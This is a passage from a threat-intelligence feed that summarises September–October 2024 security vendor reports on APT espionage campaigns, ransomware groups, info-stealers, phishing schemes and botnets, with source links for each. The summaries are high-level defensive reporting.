Summary:: Researchers from ESET have found CeranaKeeper, a new China-aligned threat actor that targets Thailand's governmental organizations. Some of its tools were previously assigned to Mustang Panda by other scientists. This organization frequently upgrades its backdoor to avoid detection and varies its tactics to enable large-scale data exfiltration. CeranaKeeper uses legitimate cloud and file-sharing services, such as Dropbox and OneDrive, to build secret backdoors and extraction tools.

Source: https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/

Intel Source:: NVISO Labs

Intel Name:: JavaScript_Role_in_Spear_Phishing_Attacks

Date of Scan:: 2024-10-03

Impact:: LOW

Summary:: Researchers at NVISO Labs have analyzed how attackers increasingly use JavaScript in spear phishing campaigns. They highlight various techniques cybercriminals employ, such as leveraging malicious scripts to bypass security measures and enhance the effectiveness of their attacks.

Source: https://blog.nviso.eu/2024/10/02/all-that-javascript-for-spear-phishing/

Intel Source:: Cofense

Intel Name:: The_Zoom_Phishing_Threat

Date of Scan:: 2024-10-03

Impact:: LOW

Summary:: Researchers from Cofense have identified a phishing campaign targeting Microsoft accounts through legitimate Zoom Docs links. This phishing campaign tricks users by sending an official invitation for a Contract Bid Proposal from no-reply@zoom.us, a common address used by Zoom which creates a sense of urgency. When users click on the "Download Secure Attachment" link in the email, they are directed to a real Zoom Docs page which seems email trustworthy. However, if users click the malicious link while using a Windows device then they are redirected to a fake Microsoft login page to steal their login details, as the attackers are specifically focusing on Windows users.

Source: https://cofense.com/blog/from-collaboration-to-deception-the-zoom-phishing-threat

Intel Source:: ThreatMon

Intel Name:: Diving_Deep_into_Amnesia_Stealer

Date of Scan:: 2024-10-03

Impact:: LOW

Summary:: ThreatMon researchers have provided a detailed technical analysis of the Amnesia Stealer malware. It is a sophisticated, open-source malware posing a significant threat due to its availability on underground forums and its Malware-as-a-Service (MaaS) model. It features a user-friendly interface for cybercriminals to execute data theft and gain system control, utilizing Discord and Telegram for Command & Control operations. The malware can steal sensitive information such as browser passwords, cryptocurrency wallets, and Wi-Fi credentials, and includes advanced capabilities like keylogging and clipboard hijacking. It can bypass Windows Defender and inject additional threats like trojans and miners.

Source: https://45734016.fs1.hubspotusercontent-na1.net/hubfs/45734016/AMNESIA%20STEALER%20REPORT.pdf?__hstc=205617164.4ca88179e9c4de00be257a0ec5f4dee7.1721037753230.1726138178169.1727940935391.10&__hssc=205617164.1.1727940935391&__hsfp=2296146515

Intel Source:: Qualys

Intel Name:: A_Deep_Dive_into_Akira_Ransomware

Date of Scan:: 2024-10-03

Impact:: MEDIUM

Summary:: Researchers from Qualys have identified a ransomware group called Akira Ransomware that has been active since 2023 and targeting multiple industries primarily in North America, the UK, and Australia. It operates as a Ransomware-as-a-Service (RaaS). This group not only encrypts files but also steals data using double extortion tactics and gain the access through stolen credentials or vulnerabilities. They use various tools such as Mimikatz and AdFind to maintain access, dump credentials and bypass defenses. Akira uses the ChaCha encryption algorithm, and its victims can communicate with the attackers via a TOR site.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/02/threat-brief-understanding-akira-ransomware#indicators-of-compromise

Intel Source:: Securonix Threat Labs

Intel Name:: SHROUDED_SLEEP_Campaign

Date of Scan:: 2024-10-03

Impact:: MEDIUM

Summary:: Researchers from Securonix uncovered a campaign called SHROUDED#SLEEP which is operated by North Korea threat actor group called APT 37 also known as Reaper or Group123. The threat actor is targeting countries in Southeast Asia with a primarily focus on Cambodia. The attack begins with phishing email containing malicious documents such as PDF or Excel files which hide PowerShell malware called VeilShell that act as backdoor and gives attackers full control over the victim’s machine. VeilShell allows the attacker to exfiltrate files, modify system settings, create scheduled tasks, and manipulate the Windows registry.

Source: https://www.securonix.com/blog/shroudedsleep-a-deep-dive-into-north-koreas-ongoing-campaign-against-southeast-asia/

Intel Source:: ESET

Intel Name:: CeranaKeeper_Threat_Actor

Date of Scan:: 2024-10-02

Impact:: MEDIUM

Summary:: ESET researchers have identified a new China-aligned cyber threat actor, dubbed CeranaKeeper, which has been actively targeting governmental institutions in Thailand since at least early 2022. This group employs a sophisticated array of custom tools for data exfiltration, utilizing legitimate cloud services like Dropbox, OneDrive, and GitHub to evade detection. CeranaKeeper's operations demonstrate significant creativity and adaptability, as they leverage previously undocumented methods to gain access to networks and extract sensitive information.

Source: https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/

Intel Source:: Github (silence-is-best)

Intel Name:: September_Malspam_Campaigns

Date of Scan:: 2024-10-02

Impact:: LOW

Summary:: Aggregation of September malspam campaign details shared by researcher silence-is-best

Source: https://gist.github.com/silence-is-best/2efe46038a58d20e173fb5ca0a3f7f43

Intel Source:: Symantec

Intel Name:: Stonefly_Group

Date of Scan:: 2024-10-02

Impact:: MEDIUM

Summary:: Symantec’s Threat Hunter Team has uncovered ongoing financially motivated attacks by the North Korean cyber group Stonefly against U.S. organizations, despite an indictment and a significant reward for information on one of its members. In August 2024, Stonefly attempted to infiltrate three U.S. private companies, deploying their custom malware Backdoor.Preft among other tools, although they did not succeed in launching ransomware. The group's tactics include using a mix of previously known and newly obtained tools, such as the credential dumping tool Mimikatz and various keyloggers, to harvest sensitive data.

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/stonefly-north-korea-extortion

Intel Source:: Gen Threat Labs

Intel Name:: WarmCookie_Backdoor_Update

Date of Scan:: 2024-10-02

Impact:: MEDIUM

Summary:: A new FakeUpdate campaign by the threat group SocGolish is targeting users in France with fake browser and application update prompts to spread an updated version of the WarmCookie backdoor. Disguised as updates for Google Chrome, Mozilla Firefox, Microsoft Edge, and Java, these prompts appear on compromised websites. When clicked, they install malware instead of legitimate updates. WarmCookie, first identified in 2023, has expanded capabilities such as data theft, command execution, and additional malware delivery. The latest version now includes features like running DLLs and executing EXE or PowerShell files.

Source: https://x.com/GenThreatLabs/status/1840762181668741130

Intel Source:: NSFocus

Intel Name:: Gorilla_Botnet

Date of Scan:: 2024-10-01

Impact:: LOW

Summary:: Researchers from NSFocus have identified a botnet which is an advance version of Mirai called Gorilla Botnet that targets over 100 countries but U.S and China are most affected countries. It targets various sectors like universities, government websites, telecoms, banks, gaming and gambling industries. This Botnet supports multiple CPU architectures, such as ARM, MIPS, and x86 and has five C&C servers and can launch 19 different types of DDoS attacks.

Source: https://nsfocusglobal.com/over-300000-gorillabot-the-new-king-of-ddos-attacks/

Intel Source:: Trend Micro

Intel Name:: Mitigating_More_Eggs_Backdoor_Using_MDR_Solutions

Date of Scan:: 2024-10-01

Impact:: LOW

Summary:: Researchers from Trend Micro have reported that its MDR team used the Vision One platform to protect against a more_eggs backdoor infection. This attack began when a recruitment officer downloaded a malicious file masquerading as a resume, which triggered the execution of the more_eggs malware. The MDR team immediately discovered the infected endpoint, blocked Indicators of Compromise (IOCs), and automated the response with custom filters and the Security Playbook, resulting in effective threat containment.

Source: https://www.trendmicro.com/en_us/research/24/i/mdr-in-action--preventing-the-moreeggs-backdoor-from-hatching--.html

Intel Source:: Palo Alto

Intel Name:: Swiss_Army_Suite_Tool_for_Vulnerability_Scanning

Date of Scan:: 2024-10-01

Impact:: LOW

Summary:: Researchers at Palo Alto have discovered an automated scanning tool called Swiss Army Suite which is used by attackers to scan websites for vulnerabilities. This tool uses a technique called SQL injection that manipulates databases by inserting malicious code. It can scan numerous websites and includes a Dork Checker which uses specific search terms to locate sensitive information online. Additionally, the tool offers features like a vulnerability scanner and proxy checker and it is available on underground forums.

Source: https://unit42.paloaltonetworks.com/machine-learning-new-swiss-army-suite-tool/

Intel Source:: ReliaQuest

Intel Name:: Fortinet_Firewall_Exploited_in_Attack

Date of Scan:: 2024-10-01

Impact:: LOW

Summary:: Researchers from ReliaQuest have found a data exfiltration attack in July 2024, targeting a customer in the manufacturing sector. Threat actors gained access to a Fortinet firewall and brute-forced a privileged service account, allowing them to exfiltrate sensitive data from several file servers using technologies such as Secure Copy Protocol. The ReliaQuest Threat Hunting team responded quickly, using GreyMatter Response Playbooks to isolate affected hosts and reset compromised accounts. This incident indicates the need for good perimeter device patch management, complete endpoint detection and response (EDR), and strong host-based policies to mitigate future threats.

Source: https://www.reliaquest.com/blog/data-exfiltration-attack-analysis-manufacturing-sector-breach/

Intel Source:: Securelist

Intel Name:: Keygroup777_Ransomware_Group

Date of Scan:: 2024-10-01

Impact:: MEDIUM

Summary:: Researchers at Securelist have identified a new ransomware group called Keygroup777 which is financially motivated group and primarily targets Russian user. This group has been active since 2022 and uses various ransomware builders like Xorist, Chaos, Annabelle, Slam, RuRansom, UX-Cryptor and Hakuna Matata. Their ransom notes typically include both Russian and English and provide contact details for negotiations through Telegram. The group uses techniques such as disabling security features on victims' systems and modifying registry keys to ensure persistence. Their activities often reflect a mix of financial and ideological motivations and leave their digital footprints on platforms like GitHub and Telegram.

Source: https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/

Intel Source:: Cyfirma

Intel Name:: Exposing_Transparent_Tribes_Attack_Tactics

Date of Scan:: 2024-10-01

Impact:: MEDIUM

Summary:: Researchers at CYFIRMA have found 15 malicious C2 servers linked to the APT group "Transparent Tribe" (APT36), which were hosted on DigitalOcean and used the Mythic C2 framework. The group was discovered utilizing Linux desktop entry files disguised as PDFs to send harmful binaries, particularly to victims in India. This campaign demonstrates an increased emphasis on Linux environments, particularly in Indian government sectors that use the Debian-based BOSS OS and the recently disclosed Maya OS.

Source: https://www.cyfirma.com/research/osint-investigation-hunting-malicious-infrastructure-linked-to-transparent-tribe/

Intel Source:: Cyble

Intel Name:: Unauthorized_Access_through_Visual_Studio_Code

Date of Scan:: 2024-10-01

Impact:: LOW

Summary:: Researchers from CRIL have identified an attack in which threat actors leverage legitimate tools like Visual Studio (VS) Code. The attack begins with the delivery of an LNK file via spam emails. Once the file is executed, it downloads a python package that runs a malicious script. The attackers then use VS code to create a remote tunnel which allows them an unauthorized remote access to the victim's machine. This access allows the attackers to access the system, manipulate files, execute commands and potentially install malicious software. Additionally, the attacker also sets up a scheduled task that automatically runs the malicious script with high system privileges.

Source: https://cyble.com/blog/silent-intrusion-unraveling-the-sophisticated-attack-leveraging-vs-code-for-unauthorized-access/

Intel Source:: IC3 GOV

Intel Name:: Iranian_Threat_Actors_Targeting_Personal_Accounts

Date of Scan:: 2024-09-30

Impact:: MEDIUM

Summary:: A Joint advisory has been issued by FBI, U.S Cyber command, Treasury Department and UK (NCSC) about activities linked to Iranian threat actor. These threat actors working on behalf of IRGC and target individual in Middle Eastern and Iranian affairs such as government officials, think tank staff, journalists, activists and lobbyists. FBI has also observed these threat actors targeting persons associated with US political campaigns. The attackers use social engineering tactics such as impersonating known contacts or email providers to trick victims into giving away sensitive information like login credentials. Once they successful then attackers can take over accounts to forward emails, delete messages and connect unknown devices to the victim’s account.

Source: https://www.ic3.gov/Media/News/2024/240927.pdf

Intel Source:: Netspoke

Intel Name:: New_Version_of_XWorm_Tool

Date of Scan:: 2024-09-30

Impact:: LOW

Summary:: Netskope researchers have identified a new version of Xworm tool. This tool first appeared in 2022 and capable of stealing sensitive information, gaining remote access and deploying other malware. NullBulge and TA558 have been using XWorm in attacks. The infection begins with Windows Script File (WSF) which deliver through phishing that tricks users into downloading and running a PowerShell script hosted on a legitimate site called Paste.ee. XWorm’s new version includes commands for removing plugins, monitoring its network response time, modifying the system’s hosts file, launching DDoS attacks and taking screenshots of the victim's computer.

Source: https://www.netskope.com/blog/netskope-threat-labs-uncovers-new-xworms-stealthy-techniques

Intel Source:: The DFIR Reports

Intel Name:: Nitrogen_Malware_Campaign

Date of Scan:: 2024-09-30

Impact:: MEDIUM

Summary:: DFIR researchers have discovered a campaign where user downloaded a malicious version of IP Scanner from a fake website that appeared in Google ads. The downloaded file is part of a Nitrogen malware campaign. The attackers use legitimate python script to deploy the malware and then deploy silver tool for remote access. They use an open-source backup tool called Restic to steal data from file shares and send it to a remote server. The attacker explores the network by using window tool and deploy cobalt strike to steal credential. After getting admin access the attacker deploy a Blackcat ransomware across the network to encrypted files on affected machines.

Source: https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/

Intel Source:: Sekoia

Intel Name:: 8220_Gang_Exploits_WebLogic_with_Hadooken

Date of Scan:: 2024-09-30

Impact:: LOW

Summary:: Researchers from Sekoia have discovered an infection chain that targets both Windows and Linux computers via Oracle WebLogic vulnerabilities and deploys the K4Spreader malware, which delivers the Tsunami backdoor and a cryptominer. Similarly, AquaSec revealed that the Hadooken malware was infecting WebLogic systems via a configuration vulnerability. The 8220 Gang, a Chinese-based gang famous for violating cloud settings to mine Monero coin, is responsible for both instances, including the sharing of strategies, techniques, and Monero wallets.

Source: https://blog.sekoia.io/hadooken-and-k4spreader-the-8220-gangs-latest-arsenal/

Intel Source:: Elastic Security Labs

Intel Name:: Linux_Malware_Campaign_Exploits_Servers_and_APIs

Date of Scan:: 2024-09-27

Impact:: MEDIUM

Summary:: Researchers at Elastic Security Labs have discovered the REF6138 campaign, a Linux malware operation that has been infecting an Apache2 server since March 2024. The attackers used KAIJI for DDoS attacks and RUDEDEVIL for cryptomining, with C2 channels masquerading as kernel processes, Telegram bots for communication, and cron jobs for task execution. The effort most likely includes money laundering through Bitcoin/XMR mining using casino APIs, as daily uploads of new KAIJI samples indicate active development.

Source: https://www.elastic.co/security-labs/betting-on-bots

Intel Source:: Recorded Future

Intel Name:: Rhadamanthys_Stealer_Adds_AI_Feature

Date of Scan:: 2024-09-27

Impact:: LOW

Summary:: Researchers from Insikt Group have observed the information-stealing malware named Rhadamanthys that first emerged in 2022. It is sold on subscription model as cost 250$ for 30 days. It has a capability of stealing the data such as system information, passwords, cryptocurrency wallets and browser data. This stealer has been updated with new version 0.7.0 along with new features like using AI to extract cryptocurrency seed phrases from images and installing Microsoft Software Installer (MSI) files that can avoid detection by traditional security systems.

Source: https://go.recordedfuture.com/hubfs/reports/mtp-2024-0926.pdf

Intel Source:: ESET

Intel Name:: Gamaredon_Cyber_Operations_During_Ukraine_Crisis

Date of Scan:: 2024-09-27

Impact:: LOW

Summary:: Researchers at ESET have investigated Gamaredon's cyberespionage tools used against Ukraine in 2022 and 2023. Despite Russia's stepped-up invasion since February 2022, Gamaredon, a Russia-aligned APT active since 2013, has continually targeted Ukrainian entities with the same level of cyberactivity. According to ESET's findings, Gamaredon has taken a deliberate approach to its attacks, demonstrating its continued interest on espionage in the region throughout the continuing conflict.

Source: https://www.welivesecurity.com/en/eset-research/cyberespionage-gamaredon-way-analysis-toolset-used-spy-ukraine-2022-2023/

Intel Source:: Netspoke

Intel Name:: DCRat_Targets_Users_with_HTML_Smuggling

Date of Scan:: 2024-09-27

Impact:: LOW

Summary:: Netspoke Researchers have identified a malware called DCRat also known as Dark Crystal which has been active since 2018 and is sold as malware-as-a-service (MaaS). This malware is written in C# language and has capabilities like executing commands, logging keystrokes, and stealing files and credentials. Researchers also found DCRat is now being distributed using new technique called HTML smuggling that specifically target Russian-speaking users. HTML smuggling hides malicious code in HTML file which can bypass security checks and get downloaded through the victim’s web browser. The malware is concealed as fake versions of popular Russian apps like TrueConf and VK Messenger.

Source: https://www.netskope.com/blog/dcrat-targets-users-with-html-smuggling

Intel Source:: Palo Alto

Intel Name:: Phishing_Service_Using_Proxies_to_Evade_Detection

Date of Scan:: 2024-09-26

Impact:: LOW

Summary:: Researchers at Palo Alto have identified the Sniper Dz phishing-as-a-service (PhaaS) platform, which targets social media platforms and online services and has been linked to over 140,000 phishing websites in the last year. Sniper Dz offers free templates and hosting to phishers, which are paid for with stolen credentials. To avoid detection, it hides phishing information behind public proxies and frequently utilizes genuine SaaS hosting platforms. Phishers utilize well-known brand names and trends to entice victims, and hijacked websites may route them to malicious adverts or unwanted programs.

Source: https://unit42.paloaltonetworks.com/phishing-platform-sniper-dz-unique-tactics/

Intel Source:: Cloudflare

Intel Name:: Cloud_Services_Exploited_in_Asia

Date of Scan:: 2024-09-26

Impact:: LOW

Summary:: Researchers from Cloudflare have discovered SloppyLemming, a threat actor targeting South and East Asia who uses cloud providers for credential harvesting, malware delivery, and C2 activities. It has been active since late 2022 and primarily targets the government, defense, and technological sectors of Pakistan, Bangladesh, Sri Lanka, Nepal, and China. SloppyLemming's inadequate OPSEC revealed the employment of Cobalt Strike and Havoc, as well as the alignment with CrowdStrike's OUTRIDER TIGER.

Source: https://www.cloudflare.com/en-in/threat-intelligence/research/report/unraveling-sloppylemmings-operations-across-south-asia/

Intel Source:: Cyble

Intel Name:: Patchwork_Targeting_Chinese_and_Bhutan_Entities

Date of Scan:: 2024-09-26

Impact:: LOW

Summary:: Cyble researchers have identified campaign where an APT group called Patchwork also known as Dropping Elephant is targeting China and Bhutan. This group is active since 2009 and primarily focuses on government, defense and diplomatic organizations in across South and Southeast Asia. The attackers lure victims into downloading malicious LNK files disguised as Chinese aerospace event and the Bhutan Adaptation Fund Board. Once user click these files, it downloads malicious PDF and a DLL file. This DLL decrypts and runs the final payload in the system memory and allow the malware to gathers sensitive information like Process ID, IP addresses, and usernames and sends the data to a C2 server controlled by the attacker for further malicious actions.

Source: https://cyble.com/blog/nexe-backdoor-unleashed-patchwork-apt-groups-sophisticated-evasion-of-defenses/

Intel Source:: Palo Alto

Intel Name:: KLogEXE_and_FPSpy_Found_in_Latest_Threat_Campaign

Date of Scan:: 2024-09-26

Impact:: MEDIUM

Summary:: Researchers from Palo Alto have identified two new malware variants used by the Sparkling Pisces (aka Kimsuky) group: KLogEXE, an undocumented keylogger, and FPSpy, a backdoor variant. These enhancements expand Sparkling Pisces' already advanced toolkit while demonstrating their continual progress. The FPSpy variation is believed to be tied to a 2022 campaign aimed against a South Korean technological business. The analysis of these malware samples revealed sophisticated capabilities such as keylogging, data exfiltration, and command execution.

Source: https://unit42.paloaltonetworks.com/kimsuky-new-keylogger-backdoor-variant/

Intel Source:: Microsoft

Intel Name:: Storm_0501_Target_Cloud_Environment

Date of Scan:: 2024-09-26

Impact:: MEDIUM

Summary:: Microsoft researchers have identified a financially motivated threat actor known as Storm-0501 has been active since 2021. The group initially targeted U.S. schools with ransomware to extort money but later moved to a ransomware-as-a-service (RaaS) model to collaborate with other cybercriminals to distribute various ransomware strains. Recently this group has began its attacks by compromising hybrid cloud environments and then move from on-premises networks to cloud systems that leads to data exfiltration, credential theft, system tampering, backdoor access and ransomware deployment. These attacks have targeted multiple sectors across the United States such as government, manufacturing, transportation and law enforcement.

Source: https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/

Intel Source:: CloudFlare

Intel Name:: A_Deep_Dive_into_SloppyLemming

Date of Scan:: 2024-09-26

Impact:: LOW

Summary:: Researchers at Cloudflare have discovered a cyber espionage group that has been active since 2022 named SloppyLemming. This group targets various entities such as government, law enforcement, energy, telecommunications and technology in South and East Asia like Pakistan, Sri Lanka, Bangladesh and China. They often use phishing tactic and custom-built tools like "CloudPhish" to create fake login portals and exfiltrate credentials through services like Discord. SloppyLemming has been observed using Google OAuth token theft to gain access to Gmail accounts and deploying malware through infected files hosted on services like Dropbox.

Source: https://blog.cloudflare.com/unraveling-sloppylemming-operations/

Intel Source:: Trustwave

Intel Name:: HTML_Smuggling

Date of Scan:: 2024-09-25

Impact:: LOW

Summary:: Trustwave researchers have identified HTML smuggling where cybercriminals use JavaScript code in phishing emails or websites to create malicious files on a victim’s computer instead of downloading them from a remote server. In a recent phishing campaign, attackers impersonated brands like American Express, DocuSign and Microsoft by sending emails with links that eventually led to a phishing page. The phishing page is encoded with JavaScript and turn into a Blob URL. When the user open this URL, it appeared to be a legitimate American Express page, but it is actually a phishing scam.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-smuggling-how-blob-urls-are-abused-to-deliver-phishing-content/

Intel Source:: Proofpoint

Intel Name:: Multiple_Malware_Targeting_Transport_and_Logistics

Date of Scan:: 2024-09-25

Impact:: LOW

Summary:: Proofpoint Researchers have identified a campaign where transportation and logistics companies in North America are being targeted to spread various types of malwares. The attackers use compromised email accounts from legitimate companies to send malicious content within ongoing email conversations. Initially, they delivered malware such as Lumma Stealer, StealC and NetSupport but now they have added more malware such as DanaBot and Arechclient2. The attackers are using new tactic called “ClickFix” where users are tricked into running a PowerShell script to install malware. The attackers also appear to research their targets, tailoring their messages to look legitimate within the transport and logistics sector.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering

Intel Source:: Securelist

Intel Name:: BlackJack_and_Twelve_Hacktivists_Linked

Date of Scan:: 2024-09-25

Impact:: LOW

Summary:: Researchers at securelist have found connections between two hacktivist groups, BlackJack and Twelve, while researching attacks on Russian organizations. Both groups utilize identical strategies, techniques, and malware to target the Russian government and industrial sector. Though it's unclear whether the same people are responsible for both, they appear to be part of a single cluster dedicated to creating damage by encrypting, destroying, and stealing data, rather than financial gain.

Source: https://securelist.com/blackjack-hacktivists-connection-with-twelve/113959/

Intel Source:: Medium (Walmart)

Intel Name:: Rilide_Malware_Targeting_Credentials_and_Wallets

Date of Scan:: 2024-09-25

Impact:: LOW

Summary:: Researchers at walmart have detected Rilide, formerly known as CookieGenesis, as a malicious browser extension capable of credential harvesting, cookie stealing, system information collection, and webinject attacks. It can also retrieve screenshots, locate files and wallets, and adjust balances on networks such as Facebook, Coinbase, and Google Pay. Rilide utilizes several C2 traffic mechanisms, including Telegram and blockchain transaction decoding. One gang found used a distinct C2 structure and distributes malware via a pay-per-install (PPI) service.

Source: https://medium.com/walmartglobaltech/diving-into-rilide-02684e540b48

Intel Source:: Cofense

Intel Name:: TikTok_Links_Hijack_Microsoft_Accounts

Date of Scan:: 2024-09-25

Impact:: LOW

Summary:: Cofense researchers have uncovered a phishing campaign that uses TikTok URLs to trick users into giving away their Microsoft Office 365 credentials. The phishing emails pretend to be from the user’s IT department, claiming that emails will be deleted if immediate action is not taken. The emails contain TikTok URLs that redirect users to a fake Microsoft login page designed to steal their credentials. The phishing page even auto-fills the user’s email to make the scam more legitimate.

Source: https://cofense.com/blog/exploiting-social-media-tiktok-links-used-to-hijack-microsoft-accounts

Intel Source:: IC3 GOV

Intel Name:: Compromised_Routers_Linked_to_Chinese_Botnet

Date of Scan:: 2024-09-24

Impact:: HIGH

Summary:: U.S. agencies, including the FBI, CNMF, and NSA, have determined that cyber actors linked to the People's Republic of China (PRC) have gained access to thousands of Internet-connected devices, including SOHO routers, firewalls, NAS, and IoT devices, building a huge botnet for illegal operations. The botnet, which is run by the PRC-based Integrity Technology Group, has been active since mid-2021 and, as of June 2024, had over 260,000 hacked devices globally. These devices are used to perform attacks using DDoS and compromise specified US networks.

Source: https://www.ic3.gov/Media/News/2024/240918.pdf

Intel Source:: Slientpush

Intel Name:: Russian_Threat_Actor_Targeting_US_Election

Date of Scan:: 2024-09-24

Impact:: LOW

Summary:: Slientpush researchers have discovered campaign that linked to Russian threat actor where they are actively running crypto scams that target the U.S. Presidential Election and major U.S. tech brands. These scams involve fake promotions that claim double Bitcoin and Ethereum if victims send cryptocurrency to a wallet controlled by the attackers. The attackers have set up websites featuring well-known figures like Donald Trump, Kamala Harris, Elon Musk and Tim Cook as well as fake legal documents from U.S. government agencies to make the scam seem legitimate.

Source: https://www.silentpush.com/blog/us-political-crypto-scams/

Intel Source:: Datadog Security Labs

Intel Name:: Threat_Actor_Targets_Docker_and_Kubernetes

Date of Scan:: 2024-09-24

Impact:: LOW

Summary:: Datadog researchers have discovered a malware campaign targeting technologies like Docker and Kubernetes. The attackers exploit vulnerabilities in Docker systems to gain access and install a cryptocurrency miner on compromised containers. Their tools specifically target Kubernetes' kubelet API which manages containers that allow the attackers to take control and spread more malware. They also used Docker Hub, a public container registry to distribute their malicious software with the account "nmlmweb3" linked to this campaign. Additionally more malware samples were identified in an open directory on their C2 server that shows their focus on targeting Docker Swarm which is another platform for managing containers.

Source: https://securitylabs.datadoghq.com/articles/threat-actors-leveraging-docker-swarm-kubernetes-mine-cryptocurrency/

Intel Source:: Palo Alto

Intel Name:: SnipBot_Malware_Targets_IT_and_Legal_Sectors

Date of Scan:: 2024-09-24

Impact:: MEDIUM

Summary:: Researchers from Palo Alto Networks have found SnipBot, a new version of the RomCom malware that exploits unique code obfuscation and anti-analysis methods. This malware was discovered in early 2024, with origins tracing back to December 2023. SnipBot lets attackers to run commands and download new modules into a victim's computer. It expands on previous RomCom versions (3.0 and 4.0) and may be focused toward espionage rather than financial gain.

Source: https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/

Intel Source:: Mandiant

Intel Name:: UNC5267_Campaign

Date of Scan:: 2024-09-23

Impact:: MEDIUM

Summary:: Mandiant researchers have uncovered an operation called UNC5267 where North Korean IT worker is sent abroad primarily to China and Russia with smaller groups in Africa and Southeast Asia. These workers are deployed by the North Korean government to secure remote jobs often in Western tech companies particularly in the U.S. tech sector for financial gain and long-term access to networks. These workers use fake resumes and online profiles to get hired, then connect to company laptops remotely via tools like AnyDesk or TeamViewer to hide their true locations using VPNs.

Source: https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/

Intel Source:: SentinelOne

Intel Name:: Kryptina_RaaS_Updates

Date of Scan:: 2024-09-23

Impact:: LOW

Summary:: Sentinel researchers have identified a new tool called Kryptina, a free and open-source ransomware platform is used in enterprise attacks particularly by affiliates of the Mallox ransomware family. Mallox ransomware has been active since 2021 and is also known as FARGO, XOLLAM or BOZON. The ransomware group had adopted and modified Kryptina's code to create a new Linux version of this ransomware. The adoption of Kryptina by the Mallox affiliate shows the growing trend of ransomware commoditization where cyber criminals use and modify shared code to create new variants.

Source: https://www.sentinelone.com/labs/kryptina-raas-from-unsellable-cast-off-to-enterprise-ransomware/

Intel Source:: Huntress

Intel Name:: Key_Signs_of_Akira_Ransomware

Date of Scan:: 2024-09-23

Impact:: LOW

Summary:: Researchers from Huntress have observed the important indicators leading up to Akira ransomware attacks, such as the development of new user accounts through lateral movement or vulnerable MSSQL servers. Compromised accounts are sometimes used to get access to endpoints, whether or not RDP is enabled. Limited visibility in events is frequently caused by incomplete Huntress agent deployment or out-of-date Windows systems, affecting detection attempts.

Source: https://www.huntress.com/blog/akira-ransomware-indicators

Intel Source:: Securelist

Intel Name:: Twelve_Group_Tactics_Revealed_in_Attack

Date of Scan:: 2024-09-23

Impact:: LOW

Summary:: Researchers from Securelist have discovered that in spring 2024, the TWELVE group shared personal data on a Telegram channel, which was subsequently closed for violating the platform's terms. Following several months of dormancy, a June 2024 attack used identical techniques and command-and-control servers linked to the gang. The researchers believe the gang is still functioning and will resurface. The attackers' actions are examined utilizing the Unified Kill Chain technique.

Source: https://securelist.com/twelve-group-unified-kill-chain/113877/

Intel Source:: Esentire

Intel Name:: Go_Injector_Leading_to_Stealers

Date of Scan:: 2024-09-20

Impact:: LOW

Summary:: ESentire researchers have uncovered a malware attack involving Lumma Stealer which steals sensitive information such as cryptocurrency wallets and two-factor authentication data. The attack begins when a user visits a fake website and is tricked into running a PowerShell command disguised as a captcha verification step. This command downloads a zip file containing legitimate-looking files along with a malware injector called Go Injector. The injector secretly inserts the Lumma Stealer into a new process and initiates the attack by decrypting the stolen data and sending it to the attacker's servers.

Source: https://www.esentire.com/blog/go-injector-leading-to-stealers

Intel Source:: ISC.SANS

Intel Name:: Malicious_Website_Impersonates_GitHub_Security

Date of Scan:: 2024-09-20

Impact:: MEDIUM

Summary:: https://isc.sans.edu/diary/Fake%20GitHub%20Site%20Targeting%20Developers/31282

Source: https://isc.sans.edu/diary/Fake%20GitHub%20Site%20Targeting%20Developers/31282

Intel Source:: Trend Micro

Intel Name:: EDRKillShifter_Disable_EDR_and_Antivirus

Date of Scan:: 2024-09-20

Impact:: MEDIUM

Summary:: Trend Micro researchers have identified a new tool integrated by RansomHub group called EDRKillShifter. This tool has capabilities to exploit vulnerabilities in legitimate system drivers to disable antivirus and EDR. It enables attackers to remain active in the system even after bypassing initial security defenses. The process begins when an attacker runs EDRKillShifter with a password. Once the correct password is entered, the tool decrypts and executes a file which then unpacks the final payload containing a vulnerable driver. The driver is then exploited to gain high-level privileges, allowing the attacker to disable EDR tools.

Source: https://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html

Intel Source:: Huntress

Intel Name:: Ransomware_Attack_Triggers_Endpoint_Alerts

Date of Scan:: 2024-09-20

Impact:: LOW

Summary:: Researchers from Huntress have discovered a cyberattack in September 2024 in which an endpoint displayed indicators of enabling remote desktop access, preventing system recovery, and running ransomware. Within 20 minutes, the endpoint's files had been encrypted, suggesting a successful ransomware distribution.

Source: https://www.huntress.com/blog/readtext34-ransomware-incident

Intel Source:: Palo Alto

Intel Name:: Splinter_Emerging_Post_Exploitation_Tool

Date of Scan:: 2024-09-20

Impact:: LOW

Summary:: Researchers at Palo Alto have found Splinter, a new post-exploitation red team tool, when searching memory with their Advanced WildFire tools. Although penetration testing frameworks like Splinter can improve security by identifying flaws, they can also be used by fraudulent actors.

Source: https://unit42.paloaltonetworks.com/analysis-pentest-tool-splinter/

Intel Source:: Trend Micro

Intel Name:: Earth_Baxia_Exploits_CVE_2024_36401

Date of Scan:: 2024-09-19

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered that Earth Baxia, a threat actor group likely based in China, has been spear-phishing government agencies in Taiwan and probably other APAC nations and leveraging the GeoServer vulnerability CVE-2024-36401. This vulnerability, a remote code execution flaw, enabled attackers to download and install malicious components.

Source: https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html

Intel Source:: Cloudsek

Intel Name:: Lumma_Stealer_Exploits_Fake_CAPTCHA_Pages

Date of Scan:: 2024-09-19

Impact:: LOW

